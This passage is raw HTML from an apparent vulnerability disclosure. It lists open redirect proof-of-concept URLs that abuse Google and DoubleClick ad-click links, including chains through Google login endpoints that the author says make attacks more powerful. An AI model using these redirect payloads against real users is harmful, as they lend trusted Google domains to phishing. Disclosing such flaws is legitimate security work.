target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>C-<wbr></wbr>RHnNvn2Uom8LeTaigfjkIHICfLQncc<wbr></wbr>EAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEhQFP0<wbr></wbr>LHofgVzg8U9Bvwu2_<wbr></wbr>hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6<wbr></wbr>QzMgNxx0_UawPG3-<wbr></wbr>UD097GLLCirbVMl2QxQqa04U3cp4YF<wbr></wbr>gV5dshYbzmqlVVfNn-<wbr></wbr>NuunzLNab6ATE5BUwQ9bgXBOW_<wbr></wbr>qEz8qgbwVOvUJrn1IzL-<wbr></wbr>ymANaKsQLZ9POlkbIe4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_3a3m_P_<wbr></wbr>9GRVFc6UIGvnornMcLMoQ&client=<wbr></wbr>ca-pub-0466582109566532&adurl=<wbr></wbr>http://economics.wj.com</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>CWEQH6Q73UqW9CMvMigfdiIGoB9rlk<wbr></wbr>sIEAAAQASAAUO7kr-b8_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEggFP0<wbr></wbr>E-9agyjXkIfjOxmtpPE76hNCBn1in_<wbr></wbr>meKMn53O-<wbr></wbr>8ZFlbxWDgYdaVZQKJza8mIRXw22hWI<wbr></wbr>VMAOJJzq-S6AipWHe9iVZCAAlcHj-<wbr></wbr>gT2B33tD9a2oQrZ61S3-WFh_<wbr></wbr>8T8RFUFnC_PRC35CTFbueQrUYjC-<wbr></wbr>j6ncVXzt_IPXugo5vE-3x4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_<wbr></wbr>2petJH0A9Zjj45GN117ocBukiroA&<wbr></wbr>client=ca-pub-<wbr></wbr>0466582109566532&adurl=http://<wbr></wbr>www.tetraph.com/security</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>C-<wbr></wbr>RHnNvn2Uom8LeTaigfjkIHICfLQncc<wbr></wbr>EAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEhQFP0<wbr></wbr>LHofgVzg8U9Bvwu2_<wbr></wbr>hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6<wbr></wbr>QzMgNxx0_UawPG3-<wbr></wbr>UD097GLLCirbVMl2QxQqa04U3cp4YF<wbr></wbr>gV5dshYbzmqlVVfNn-<wbr></wbr>NuunzLNab6ATE5BUwQ9bgXBOW_<wbr></wbr>qEz8qgbwVOvUJrn1IzL-<wbr></wbr>ymANaKsQLZ9POlkbIe4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_3a3m_P_<wbr></wbr>9GRVFc6UIGvnornMcLMoQ&client=<wbr></wbr>ca-pub-0466582109566532&adurl=<wbr></wbr>http://www.tetraph.com/<wbr></wbr>security</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Attackers can make use of the following URLs to make the attacks more powerful, i.e.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/ServiceLogin?continue=https%3A%2F%2Fsites.google.com%2Fsite%2Fissrabhi%2Fhome&service=jotspot&passive=true&ul=1" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/ServiceLogin?<wbr></wbr>continue=https%3A%2F%2Fsites.<wbr></wbr>google.com%2Fsite%2Fissrabhi%<wbr></wbr>2Fhome&service=jotspot&<wbr></wbr>passive=true&ul=1</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fwww.orkut.com%2FRedirLogin%3Fmsg%3D1%26auth%3D*" style="background-color: white;" target="_blank">https://accounts.google.com/<wbr></wbr>accounts/SetSID?ssdc=1&sidt=*&<wbr></wbr>continue=http%3A%2F%2Fwww.<wbr></wbr>orkut.com%2FRedirLogin%3Fmsg%<wbr></wbr>3D1%26auth%3D*</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/ServiceLogin?continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fessaybeans%2Freflections%2Fsolitude.html" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/ServiceLogin?<wbr></wbr>continue=http%3A%2F%<wbr></wbr>2Fgoogleads.g.doubleclick.net%<wbr></wbr>2Faclk%3Fsa%3DL%26ai%<wbr></wbr>3DCtHoIVxn3UvjLOYGKiAeelIHIBfL<wbr></wbr>QnccEAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoE5AFP0<wbr></wbr>NHr5cHwFmWgKNs6HNTPVk7TWSV-<wbr></wbr>CDHX83dKdGSWJ2ADoZNIxUHZwjAODR<wbr></wbr>yDY_<wbr></wbr>7nVtpuqSLOTef4xzVxDQ2U22MNbGak<wbr></wbr>33Ur7i2jDB8LdYt9TbC3ifsXmklY5j<wbr></wbr>l3Zpq4_lP7wagVfjt0--<wbr></wbr>tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_<wbr></wbr>lPlnyGjlWzF8yn437iaxhGRwYLt_<wbr></wbr>CymifLO2YaJPkCm9nLpONtUM-<wbr></wbr>mstUSpKQrP2VjjaZkbDtuK0naLLBV3<wbr></wbr>7aYEY4TzWQi8fQGN47z4XgpinBCna9<wbr></wbr>1zQayZjn2wxccDCl0zgBAGgBhU%<wbr></wbr>26num%3D0%26sig%3DAOD64_<wbr></wbr>3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%<wbr></wbr>26client%3Dca-pub-<wbr></wbr>0466582109566532%26adurl%<wbr></wbr>3Dhttp%3A%2F%2Fwww.tetraph.<wbr></wbr>com%2Fessaybeans%<wbr></wbr>2Freflections%2Fsolitude.html</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.diebiyi.com%2Farticles" style="background-color: white;" target="_blank">https://accounts.google.com/<wbr></wbr>accounts/SetSID?ssdc=1&sidt=*&<wbr></wbr>continue=http%3A%2F%<wbr></wbr>2Fgoogleads.g.doubleclick.net%<wbr></wbr>2Faclk%3Fsa%3DL%26ai%<wbr></wbr>3DCtHoIVxn3UvjLOYGKiAeelIHIBfL<wbr></wbr>QnccEAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoE5AFP0<wbr></wbr>NHr5cHwFmWgKNs6HNTPVk7TWSV-<wbr></wbr>CDHX83dKdGSWJ2ADoZNIxUHZwjAODR<wbr></wbr>yDY_<wbr></wbr>7nVtpuqSLOTef4xzVxDQ2U22MNbGak<wbr></wbr>33Ur7i2jDB8LdYt9TbC3ifsXmklY5j<wbr></wbr>l3Zpq4_lP7wagVfjt0--<wbr></wbr>tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_<wbr></wbr>lPlnyGjlWzF8yn437iaxhGRwYLt_<wbr></wbr>CymifLO2YaJPkCm9nLpONtUM-<wbr></wbr>mstUSpKQrP2VjjaZkbDtuK0naLLBV3<wbr></wbr>7aYEY4TzWQi8fQGN47z4XgpinBCna9<wbr></wbr>1zQayZjn2wxccDCl0zgBAGgBhU%<wbr></wbr>26num%3D0%26sig%3DAOD64_<wbr></wbr>3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%<wbr></wbr>26client%3Dca-pub-<wbr></wbr>0466582109566532%26adurl%<wbr></wbr>3Dhttp%3A%2F%2Fwww.diebiyi.<wbr></wbr>com%2Farticles</a></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.1.2)</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">While Google prevents similar URL redirection other than googleads.g.doubleclick.<wbr></wbr>net , e.g.</span></div>
</div>
<div class="">
<div class="" data-tooltip="Hide expanded content" id=":2fp" role="button" tabindex="0">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><img class="" src="https://ssl.gstatic.com/ui/v1/icons/mail/images/cleardot.gif" style="cursor: move;" /></span></div>
</div>
</div>
<div class="">
<div class="im">
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.googleadservices.com/pagead/aclk?sa=L&ai=C8u9OibgEU_XIOKrNswfrzYDgAY2FhfgE1aLjnoYB-7qSCxADILhPKANQrt2khP3_____AWC_BaAB8-vV0gPIAQGqBChP0AshNp656okgv3tSxmgc3JZeuS25cM0HlW9wUqHwxL8nk75mFPqsgAf1k6otkAcB&num=3&val=ChA2MWI5ODZkYzA4MTlmZmRlEN-mlZgFGgghk-txLb-9bSABKAAwhPDs-dD_xPHhATj6w5KYBUD6w5KYBQ&sig=AOD64_2f3wWGlepm4KMYlixE15qmjC1FGw&adurl=http://freshservice.com/free-service-desk/" style="background-color: white;" target="_blank">http://www.googleadservices.<wbr></wbr>com/pagead/aclk?sa=L&ai=<wbr></wbr>C8u9OibgEU_<wbr></wbr>XIOKrNswfrzYDgAY2FhfgE1aLjnoYB<wbr></wbr>-7qSCxADILhPKANQrt2khP3_____<wbr></wbr>AWC_BaAB8-<wbr></wbr>vV0gPIAQGqBChP0AshNp656okgv3tS<wbr></wbr>xmgc3JZeuS25cM0HlW9wUqHwxL8nk7<wbr></wbr>5mFPqsgAf1k6otkAcB&num=3&val=<wbr></wbr>ChA2MWI5ODZkYzA4MTlmZmRlEN-<wbr></wbr>mlZgFGgghk-txLb-9bSABKAAwhPDs-<wbr></wbr>dD_xPHhATj6w5KYBUD6w5KYBQ&sig=<wbr></wbr>AOD64_<wbr></wbr>2f3wWGlepm4KMYlixE15qmjC1FGw&<wbr></wbr>adurl=http://freshservice.com/<wbr></wbr>free-service-desk/</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.googleadservices.com/pagead/aclk?sa=L&ai=C6w2J2VL1UtqeFtPFsQe_xICACOur9I0Gm4qOwXKd4q7LvAEQAiC4TygCUPrp_p7______wFgvwWgAY2TjcoDyAEBqQJGONe13HWqPqoEIk_QksMhB61R5_EBc-rRl0G3mUtOQjLemb4NjAETa6dj-AGAB9vs8jWQBwE&num=2&val=ChA5MDRhYzc4NjJiNjFlMzZlEO6g15cFGgjqLoQCBAXi2SABKAAw6sfV44GF7cZ_OMbI1ZcFQMbI1ZcF&sig=AOD64_1g--5hg2Tc0L5irweEKYqbh1FwSw&adurl=https://www.singtelshop.com/mobile/phone-details.jsf%3FbrandId%3D122%26modelId%3DZ10" style="background-color: white;" target="_blank">http://www.googleadservices.<wbr></wbr>com/pagead/aclk?sa=L&ai=<wbr></wbr>C6w2J2VL1UtqeFtPFsQe_<wbr></wbr>xICACOur9I0Gm4qOwXKd4q7LvAEQAi<wbr></wbr>C4TygCUPrp_p7______<wbr></wbr>wFgvwWgAY2TjcoDyAEBqQJGONe13HW<wbr></wbr>qPqoEIk_QksMhB61R5_EBc-<wbr></wbr>rRl0G3mUtOQjLemb4NjAETa6dj-<wbr></wbr>AGAB9vs8jWQBwE&num=2&val=<wbr></wbr>ChA5MDRhYzc4NjJiNjFlMzZlEO6g15<wbr></wbr>cFGgjqLoQCBAXi2SABKAAw6sfV44GF<wbr></wbr>7cZ_OMbI1ZcFQMbI1ZcF&sig=<wbr></wbr>AOD64_1g--<wbr></wbr>5hg2Tc0L5irweEKYqbh1FwSw&<wbr></wbr>adurl=https://www.singtelshop.<wbr></wbr>com/mobile/phone-details.jsf%<wbr></wbr>3FbrandId%3D122%26modelId%<wbr></wbr>3DZ10</a></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.2) Vulnerable URLs Related to DoubleClick.net.</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs 1:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://noteok.zdnet.com.cn/notebook/2013/1113/2995493.shtml" style="background-color: white;" target="_blank">http://ad.doubleclick.net/<wbr></wbr>click;h=v2%7C4133%7C0%7C0%7C%<wbr></wbr>2a%7Cl;276061443;0-0;0;<wbr></wbr>103152519;31-1%7C1;55814388%<wbr></wbr>7C55703677%7C1;;%3fhttp://<wbr></wbr>noteok.zdnet.com.cn/notebook/<wbr></wbr>2013/1113/2995493.shtml</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://noteok.zdnet.com.cn/notebook/2013/1113/2995493.shtml" style="background-color: white;" target="_blank">http://ad.doubleclick.net/<wbr></wbr>click;h=v2%7C4133%7C0%7C0%7C%<wbr></wbr>2a%7Cl;276061443;0-0;0;<wbr></wbr>103152519;31-1%7C1;55814388%<wbr></wbr>7C55703677%7C1;;%3fhttp://<wbr></wbr>noteok.zdnet.com.cn/notebook/<wbr></wbr>2013/1113/2995493.shtml</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.inzeed.com/kaleidoscope/" style="background-color: white;" target="_blank">http://ad.doubleclick.net/<wbr></wbr>click;h=v2%7C4133%7C0%7C0%7C%<wbr></wbr>2a%7Cl;276061443;0-0;0;<wbr></wbr>103152519;31-1%7C1;55814388%<wbr></wbr>7C55703677%7C1;;%3fhttp://www.<wbr></wbr>inzeed.com/kaleidoscope/</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.tetraph.com/security" style="background-color: white;" target="_blank">http://ad.doubleclick.net/<wbr></wbr>click;h=v2%7C4133%7C0%7C0%7C%<wbr></wbr>2a%7Cl;276061443;0-0;0;<wbr></wbr>103152519;31-1%7C1;55814388%<wbr></wbr>7C55703677%7C1;;%3fhttp://www.<wbr></wbr>tetraph.com/security</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
